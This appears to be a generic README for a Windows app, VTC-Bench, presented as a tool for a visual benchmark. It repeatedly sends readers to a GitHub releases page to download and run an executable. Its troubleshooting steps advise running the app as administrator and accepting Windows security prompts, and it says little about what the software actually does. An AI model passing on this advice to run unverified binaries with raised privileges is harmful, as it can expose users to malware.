VTC-Bench is a Windows app for VisualToolChain-Bench. It helps you run visual checks, review test output, and compare results in one place. It is built for end users who want a simple way to work with visual test data without setting up a complex toolchain.
Use it to:
- Open benchmark files
- Run visual checks on saved data
- Review results in a clear view
- Compare test runs side by side
- Keep your test work in one place
Visit this page to download the app for Windows:
https://github.com/NV0002/VTC-Bench/releases
On the release page, look for the latest version and download the Windows file that matches your PC. In most cases, this is an .exe or .zip file.
Follow these steps on a Windows PC:
- Open the release page.
- Find the latest release at the top.
- Download the Windows file.
- If you downloaded a
.zipfile, right-click it and choose Extract All. - Open the extracted folder.
- Double-click the app file to start VTC-Bench.
If Windows asks for permission, choose Yes to allow the app to open.
After setup, start VTC-Bench like this:
- Open the folder where you saved the app.
- Double-click the VTC-Bench file.
- Wait for the main window to load.
- Load your benchmark data or test set.
- Start your visual review or comparison task.
If you use the app often, create a shortcut on your desktop for faster access.
VTC-Bench keeps the main steps simple:
- Open a project to load your test data
- Run a check to view the current results
- Compare runs to see changes between two test sets
- Review output to inspect images, frames, or visual states
- Save your work so you can return to it later
The layout is meant to be easy to scan. Most tasks should take only a few clicks.
VTC-Bench is made for a standard Windows desktop or laptop. A modern system will give the best result.
Recommended setup:
- Operating system: Windows 10 or Windows 11
- Memory: 8 GB RAM or more
- Storage: 500 MB free space
- Display: 1366 × 768 or higher
- Input: Mouse and keyboard
For larger benchmark sets, more memory and free disk space may help.
The release file may include:
- The VTC-Bench app
- Support files needed to run it
- A readme file with release details
- Example data or sample projects
If the download comes as a compressed file, extract it before opening the app.
Use the open option in the app and select your project folder or file. The app will load the test set so you can start reviewing it.
Choose two runs and view them side by side. This helps you spot visual changes and check if the output matches what you expect.
Scroll through the results and inspect each item. Use this when you want to confirm the benchmark passed or find where it changed.
If the app supports saving, store your session before you close it. This helps you return to the same point later.
- Make sure the download finished
- Check that you extracted the files if you downloaded a
.zip - Try opening the file again
- Right-click the app and choose Run as administrator
- Open the release page again
- Download the file from the latest release
- If Windows shows a prompt, choose the option that lets you run the app
- Load a benchmark file or project first
- Check that the data file is in the right folder
- Try a sample project if one is included
- Maximize the app window
- Change your display scale in Windows settings
- Use a higher screen resolution if possible
- Keep the app and your test files in a simple folder path
- Avoid moving files after you load them
- Use short folder names to make file browsing easier
- Start with one small project before opening a large set
- Save copies of your benchmark data before editing
If you need a fresh copy, return here:
https://github.com/NV0002/VTC-Bench/releases
This page always shows the latest release files and older versions if you need them
If you use VTC-Bench with many benchmark sets, keep each one in its own folder. This makes it easier to find the right files and avoids mix-ups.
A simple folder plan can help:
VTC-BenchProjectsSamplesExportsArchives
A simple workflow for VTC-Bench:
- Open the app
- Load a benchmark set
- Choose the run you want to check
- Compare output
- Review the visual result
- Save or export what you need
This keeps the process clear and helps you move through each test in order
For smooth use, keep these habits:
- Close other heavy apps while VTC-Bench runs
- Store files on a local drive
- Keep your display settings steady during review
- Use the same screen size when comparing runs
- Keep your benchmark files in one place
When a new release appears on the releases page, download the latest Windows file and replace the old version if needed. Your saved projects may stay in place if you keep them in a separate folder
Use the release page for all downloads:
https://github.com/NV0002/VTC-Bench/releases
If you want the newest build, check the top release first